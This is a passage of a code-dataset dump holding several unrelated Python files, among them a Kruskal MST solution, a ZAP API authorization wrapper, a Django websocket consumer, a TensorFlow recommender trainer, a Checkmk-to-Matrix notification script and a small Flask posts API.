' ' + list[0] + '입니다. ' + list[4]), sep='\\n')\n\n\n\n\n# 나는 본 실습과제물 작성에 있어 다른 수강생의 코드를 참고하지 않고 스스로 모든 코드를 작성하였습니다.\n# 나는 본 실습과제물 결과를 수강생 누구에게도 배포하지 않았습니다.\n# 나는 모든 제출 주의사항(제출 양식)을 준수하였습니다.\n# 그렇지 않을 경우 어떠한 페널티도 감수하겠습니다.\n# 산업공학과_202211415_박규민","repo_name":"KMPAR/Python_homework","sub_path":"박규민_202211415_Practice2.py","file_name":"박규민_202211415_Practice2.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23792080230","text":"#1197 최소 스패닝 트리\n#Kruskal Algorithm\n# 1. 간선들을 정렬\n# 2. 간선이 잇는 두 정점의 root를 찾는다.\n# 3. 다르다면 하나의 root를 바꾸어 연결 시켜준다.\n# Kruskal 알고리즘은 간선들을 정렬해야하기 때문에 간선이 적으면 Kruskal Algorithm 사용\n# Kruskal Algorithm 이용\n# 1. root를 저장하는 Vroot 배열을 생선한다.(여기서 root는 연결요소 중 가장 작은 값, 처음에는 자기 자신을 저장)\n# 2. 간선들(Elist)을 가중치 기준으로 정렬한다.\n# 3. 간선들이 이은 두정점을 find함수를 통해 두 root(sRoot, eRoot)를 찾는다.\n# 4. 두 root가 다르다면 큰 root값을 작은 root값으로 만들어 연결되게 해준다.\n# 5. 가중치를 더한다.\nimport sys\n\ndef find(x):\n # print(x)\n # print(Vroot)\n if x != Vroot[x]:\n Vroot[x] = find(Vroot[x])\n return Vroot[x]\n\nv, e = map(int, sys.stdin.readline().split())\nVroot = [i for i in range(v)]\nElist = []\nfor i in range(e):\n Elist.append(list(map(int, sys.stdin.readline().split())))\nElist.sort(key = lambda x : x[2])\nanswer = 0\nfor a, b, c in Elist:\n sRoot = find(a-1)\n eRoot = find(b-1)\n if sRoot != eRoot:\n if sRoot > eRoot:\n Vroot[sRoot] = eRoot\n else:\n Vroot[eRoot] = sRoot\n # print(Vroot)\n answer += c\nprint(answer)\n\n\n#Reference : https://hillier.tistory.com/54","repo_name":"HyunJunLee-Hi/Coding_test","sub_path":"22.03.05_백준.py","file_name":"22.03.05_백준.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11836289217","text":"import six\n\n\nclass authorization(object):\n\n def __init__(self, zap):\n self.zap = zap\n\n def get_authorization_detection_method(self, contextid):\n \"\"\"\n Obtains all the configuration of the authorization detection method that is currently set for a context.\n \"\"\"\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'authorization/view/getAuthorizationDetectionMethod/', {'contextId': contextid})))\n\n def set_basic_authorization_detection_method(self, contextid, headerregex=None, bodyregex=None, statuscode=None, logicaloperator=None, apikey=''):\n \"\"\"\n Sets the authorization detection method for a context as one that identifies un-authorized messages based on: the message's status code or a regex pattern in the response's header or body. Also, whether all conditions must match or just some can be specified via the logicalOperator parameter, which accepts two values: \"AND\" (default), \"OR\". \n \"\"\"\n params = {'contextId': contextid, 'apikey': apikey}\n if headerregex is not None:\n params['headerRegex'] = headerregex\n if bodyregex is not None:\n params['bodyRegex'] = bodyregex\n if statuscode is not None:\n params['statusCode'] = statuscode\n if logicaloperator is not None:\n params['logicalOperator'] = logicaloperator\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'authorization/action/setBasicAuthorizationDetectionMethod/', params)))\n","repo_name":"zaproxy/zap-api-python","sub_path":"src/zapv2/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"53"} +{"seq_id":"31852463485","text":"# Import the necessary libraries\nimport pandas as pd\nimport gmplot\n# For improved table display in the notebook\nfrom IPython.display import display\n\nraw_data = pd.read_csv(\"coord_3.csv\")\n\n# Success! Display the first 5 rows of the dataset\ndisplay(raw_data.head(n=5))\ndisplay(raw_data.info())\n\n# Let's limit the dataset to the first 15,000 records for this example\ndata = raw_data.head(n=400)\n\n# Store our latitude and longitude\nlatitudes = data[\"lat\"]\nlongitudes = data[\"long\"]\nprint(longitudes)\n\n# latitudes.remove(\"Done\")\n\n# Creating the location we would like to initialize the focus on.\n# Parameters: Lattitude, Longitude, Zoom\ngmap = gmplot.GoogleMapPlotter(40.24717, -111.6477, 16)\ngmap.apikey = \"NOT INCLUDED\"\n# Overlay our datapoints onto the map\nret = gmap.heatmap(latitudes, longitudes)\nprint(ret)\n# Generate the heatmap into an HTML file\ngmap.draw(\"my_heatmap.html\")","repo_name":"samlarsen18/lora_project","sub_path":"heap_map/sams_heat_map.py","file_name":"sams_heat_map.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16221368508","text":"import json\nfrom json.decoder import JSONDecodeError\nfrom channels.db import database_sync_to_async\nfrom channels.exceptions import AcceptConnection, DenyConnection\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom channels.layers import get_channel_layer\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db import close_old_connections\nfrom blog.models import ReceiveMessage\n\n\n@database_sync_to_async\ndef set_message(user_id, send_user_id, content):\n ReceiveMessage.objects.create(\n user_id=user_id,\n content=content,\n send_user_id=send_user_id\n )\n\n\nclass NotificationConsumer(AsyncJsonWebsocketConsumer):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.group_name = \"message_{}\"\n self.channel_layer = get_channel_layer()\n\n async def websocket_connect(self, message):\n if self.scope.get(\"user\", AnonymousUser()).is_anonymous:\n await self.close()\n try:\n await self.connect()\n except AcceptConnection:\n await self.accept()\n except DenyConnection:\n await self.close()\n\n async def connect(self):\n await self.channel_layer.group_add(\n self.group_name.format(\n self.scope['user'].id\n ), self.channel_name\n )\n await self.accept()\n\n async def disconnect(self, code):\n if self.scope.get(\"user\", AnonymousUser()).is_anonymous:\n pass\n else:\n await self.channel_layer.group_discard(\n self.group_name.format(\n self.scope['user'].id\n ), self.channel_name\n )\n\n async def receive(self, text_data=None, bytes_data=None, **kwargs):\n if text_data:\n await self.receive_json(await self.decode_json(text_data), **kwargs)\n else:\n await self.channel_layer.group_discard(\n self.group_name.format(\n self.scope['user'].id\n ), self.channel_name\n )\n await self.close()\n\n async def receive_json(self, content, **kwargs):\n try:\n receive_content = content['content']\n user_id = content['user_id']\n except (TypeError, KeyError):\n await self.channel_layer.group_discard(\n self.group_name.format(\n self.scope['user'].id\n ), self.channel_name\n )\n await self.close()\n else:\n\n await set_message(\n send_user_id=self.scope['user'].id,\n content=receive_content,\n user_id=user_id\n )\n\n async def chat_message(self, event):\n close_old_connections()\n await self.send_json(\n {\n 'content': event['message'],\n 'send_user': event['send_user']\n }\n )\n\n @classmethod\n async def encode_json(cls, text_data):\n return json.dumps(text_data, ensure_ascii=False)\n\n @classmethod\n async def decode_json(cls, text_data):\n try:\n return json.loads(text_data)\n except JSONDecodeError:\n pass\n","repo_name":"QingChang1204/djangoProject","sub_path":"djangoProject/apps/blog/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73519572647","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\nfrom scipy.sparse import csr_matrix, find\n\nimport src.config as config\nfrom src.rec_mf import RecMF\nfrom src.util_recsys import *\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Limiting GPU memory growth\n#\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n # Restrict TensorFlow to only use the first GPU\n try:\n # Currently, memory growth needs to be the same across GPUs\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPUs\")\n except RuntimeError as e:\n # Visible devices must be set before GPUs have been initialized\n print(e)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Load Dataset\n#\ndef load_matrix_csv(path):\n\n df = pd.read_csv(path, sep=',', header=None)\n\n user_size = max(df[0].values) + 1\n item_size = max(df[1].values) + 1\n\n ret_matrix = csr_matrix((df[2].values, (df[0].values, df[1].values)), shape=(user_size, item_size))\n\n return df, ret_matrix\n\n\n_, mat_train = load_matrix_csv(config.train_path)\n_, mat_valid = load_matrix_csv(config.valid_path)\n_, mat_test = load_matrix_csv(config.test_path)\n\nmat_train /= config.quantize_unit\nmat_valid /= config.quantize_unit\nmat_test /= config.quantize_unit\n\nnum_users = mat_train.shape[0]\nnum_items = mat_train.shape[1]\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Declaration, including training setting\n#\nrec_model = RecMF(num_users, num_items, config.dim_factors, config.max_quantize)\n\noptimizer = tf.optimizers.Adam(config.learning_rate)\nema = tf.train.ExponentialMovingAverage(decay=config.emv_decay)\nbinary_ce = tf.keras.losses.BinaryCrossentropy()\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Training\n#\nsteps_per_epoch = int(num_users * num_items / config.batch_size)\nmax_step = config.max_epoch * steps_per_epoch\n\n\ndef sample_data():\n # Sample user-item index\n sampled_u_index = np.random.randint(num_users, size=config.batch_size)\n sampled_i_index = np.random.randint(num_items, size=config.batch_size)\n sampled_value = map(lambda x: mat_train[sampled_u_index[x], sampled_i_index[x]], range(len(sampled_u_index)))\n sampled_value = np.fromiter(sampled_value, dtype=np.float)\n\n # Convert entry value into one-hot sequence\n y = np.zeros([config.batch_size, config.max_quantize + 1], dtype=np.bool)\n for i in range(config.max_quantize + 1):\n y[:, i] = sampled_value > i\n y = tf.convert_to_tensor(y, dtype=tf.float32)\n\n # One-hot the user and item index respectively\n x = tf.concat([tf.one_hot(sampled_u_index, num_users, dtype=tf.float32),\n tf.one_hot(sampled_i_index, num_items, dtype=tf.float32)], axis=1)\n x = tf.tile(tf.expand_dims(x, axis=1), [1, config.max_quantize, 1])\n\n return x, y\n\n\ndef model_optimization(x, y):\n with tf.GradientTape() as tape:\n # Model forwarding\n pred = rec_model(x)\n\n # Loss function declaration\n loss = binary_ce(y_true=y, y_pred=pred)\n\n gradients = tape.gradient(loss, rec_model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, rec_model.trainable_variables))\n\n ema.apply(rec_model.trainable_variables)\n\n\ndef training():\n x, y = sample_data()\n model_optimization(x, y)\n\n\ndef testing():\n x, y = sample_data()\n pred = rec_model(x)\n return binary_ce(y_true=y, y_pred=pred)\n\n\nfor step in range(max_step):\n # Model training\n training()\n\n if step % 100 == 0:\n loss = testing()\n\n # Validation\n valid_user_idx, _, _ = find(mat_valid)\n valid_user_idx = set(valid_user_idx)\n valid_results = evaluate(mat_test, mat_train, rec_model, valid_user_idx, config.top_ks, use_prec_n_recl=True)\n\n # Testing\n test_user_idx, _, _ = find(mat_test)\n test_user_idx = set(test_user_idx) | valid_user_idx\n test_results = evaluate(mat_test + mat_valid, mat_train, rec_model, test_user_idx, config.top_ks, use_prec_n_recl=True)\n\n\n\n print(\"Step: %d / %d testing loss = %f\" % (step, steps_per_epoch, loss))\n\n\n\n\n\n\n","repo_name":"iankuoli/RecMF","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3260900024","text":"#!/usr/bin/python3\n# Matrix\n\n# Matrix notification script from @beposec inspired by:\n# Telegram_Notification from Stefan Gehn stefan+cmk@srcxbox.net\n# check_mk_matrix_notifications from Stanislav N. aka pztrn\n\n# Tested with Checkmk 2.0.0p17 on Debian Bullseye.\n\nimport os\nimport json\nimport re\nimport sys\nimport string\nimport urllib\nimport urllib.request\nimport urllib.parse\nimport random\nimport ssl\n\n#################################################################\n# Configure Matrix Connection here:\nMATRIXHOST = ''\nMATRIXTOKEN = ''\n#################################################################\n# Room id is set by Checkmk notification rule parameter\nMATRIXROOM = os.environ[\"NOTIFY_PARAMETER_1\"]\n#################################################################\n\n# Setup context for ssl certificate validation\nsslverify = ssl.create_default_context(capath=\"/etc/ssl/certs/\")\n\n# Prepare Message Template for Host Notifications\ntmpl_host_text = \"\"\"Check_MK: $HOSTNAME$ - $EVENT_TXT$\n
Host:     $HOSTNAME$\nAlias:    $HOSTALIAS$\nAddress:  $HOSTADDRESS$\nEvent:    $EVENT_TXT$\nOutput:   $LONGHOSTOUTPUT$\nComment:  $NOTIFICATIONCOMMENT$\n
\\n\n\"\"\"\n# Prepare Message Template for Service Notifications\ntmpl_service_text = \"\"\"Check_MK: $HOSTNAME$/$SERVICEDESC$ $EVENT_TXT$\n
Host:     $HOSTNAME$\nAlias:    $HOSTALIAS$\nAddress:  $HOSTADDRESS$\nService:  $SERVICEDESC$\nEvent:    $EVENT_TXT$\nOutput:   $LONGSERVICEOUTPUT$\nComment:  $NOTIFICATIONCOMMENT$\n
\\n\n\"\"\"\n\n\ndef validate_room_id(MATRIXROOM):\n # Validation of given room id\n room_id_pattern = (r\"(![a-zA-Z]+):(([a-z0-9]+(-[a-z0-9]+)*\\.)+[a-z]{2,})\")\n if not re.match(room_id_pattern, MATRIXROOM):\n sys.exit(\n \"The given value '%s' is not a proper [matrix] room id.\"\n % MATRIXROOM\n )\n\n\ndef substitute_context(template, context):\n # Replace all known variables\n for varname, value in context.items():\n template = template.replace('$'+varname+'$', value)\n\n # Remove unused variables and make them empty\n template = re.sub(r\"\\$[A-Z_][A-Z_0-9]*\\$\", \"\", template)\n return template\n\n\ndef construct_message_text(context):\n notification_type = context[\"NOTIFICATIONTYPE\"]\n if notification_type in [\"PROBLEM\", \"RECOVERY\"]:\n txt_info = \"$PREVIOUS@HARDSHORTSTATE$ -> $@SHORTSTATE$\"\n elif notification_type.startswith(\"FLAP\"):\n if \"START\" in notification_type:\n txt_info = \"Started Flapping\"\n else:\n txt_info = \"Stopped Flapping ($@SHORTSTATE$)\"\n elif notification_type.startswith(\"DOWNTIME\"):\n what = notification_type[8:].title()\n txt_info = \"Downtime \" + what + \" ($@SHORTSTATE$)\"\n elif notification_type == \"ACKNOWLEDGEMENT\":\n txt_info = \"Acknowledged ($@SHORTSTATE$)\"\n elif notification_type == \"CUSTOM\":\n txt_info = \"Custom Notification ($@SHORTSTATE$)\"\n else:\n txt_info = notification_type # Should neven happen\n\n txt_info = substitute_context(\n txt_info.replace(\"@\", context[\"WHAT\"]),\n context\n )\n\n context[\"EVENT_TXT\"] = txt_info\n\n if context['WHAT'] == 'HOST':\n tmpl_text = tmpl_host_text\n else:\n tmpl_text = tmpl_service_text\n\n return substitute_context(tmpl_text, context)\n\n\ndef fetch_notification_context():\n context = {}\n for (var, value) in os.environ.items():\n if var.startswith(\"NOTIFY_\"):\n context[var[7:]] = value\n return context\n\n\ndef send_matrix_message(text):\n # Build Matrix Message\n matrixDataDict = {\n \"msgtype\": \"m.text\",\n \"body\": text,\n \"format\": \"org.matrix.custom.html\",\n \"formatted_body\": text,\n }\n matrixData = json.dumps(matrixDataDict)\n matrixData = matrixData.encode(\"utf-8\")\n\n # Create random transaction ID for Matrix Homeserver\n txnId = ''.join(random.SystemRandom().choice(\n string.ascii_uppercase + string.digits) for _ in range(16))\n # Authorization headers and etc.\n matrixHeaders = {\"Authorization\": \"Bearer \" + MATRIXTOKEN,\n \"Content-Type\": \"application/json\",\n \"Content-Length\": str(len(matrixData))}\n # Request\n url = MATRIXHOST \\\n + \"/_matrix/client/r0/rooms/\" \\\n + MATRIXROOM \\\n + \"/send/m.room.message/\" \\\n + txnId\n req = urllib.request.Request(\n url,\n data=matrixData,\n headers=matrixHeaders,\n method='PUT'\n )\n try:\n response = urllib.request.urlopen(req, context=sslverify)\n except urllib.error.URLError as e:\n sys.stdout.write(\n 'Cannot send to matrix room: HTTP-Error %s %s\\n' % (e.reason, e)\n )\n\n\ndef main():\n validate_room_id(MATRIXROOM)\n context = fetch_notification_context()\n text = construct_message_text(context)\n send_matrix_message(text)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"beposec/checkmk-matrix-notify","sub_path":"checkmk_matrix_notification.py","file_name":"checkmk_matrix_notification.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36264649904","text":"from flask_restful import Resource, reqparse\n\nfrom ... import db, Post as PostModel\n\nimport traceback\n\nfrom typing import List\n\n\nclass Posts(Resource):\n def get(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('limit', type=int)\n parser.add_argument('author_id', type=int)\n\n args = parser.parse_args()\n author_id = args.get(\"author_id\", 0)\n limit = args.get(\"limit\", 100)\n\n if author_id:\n posts: List[PostModel] = PostModel.query.filter(PostModel.author_id == author_id).limit(limit).all()\n else:\n posts: List[PostModel] = PostModel.query.limit(limit).all()\n\n return {\n \"error\": False,\n \"data\": [\n x.to_json() for x in posts\n ]\n }, 200\n except:\n return {\n \"error\": True,\n \"data\": [],\n \"message\": traceback.format_exc()\n }\n\n\nclass Post(Resource):\n def get(self, post_id: int):\n post: PostModel = PostModel.query.filter(PostModel.id == post_id).first()\n\n if post:\n return {\n \"error\": False,\n \"data\": post.to_json()\n }, 200\n else:\n return {\n \"error\": True,\n \"data\": [],\n \"message\": \"No post found with id `{}`\".format(post_id)\n }\n","repo_name":"return0927/hello20backend","sub_path":"backend/routes/api_v1/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}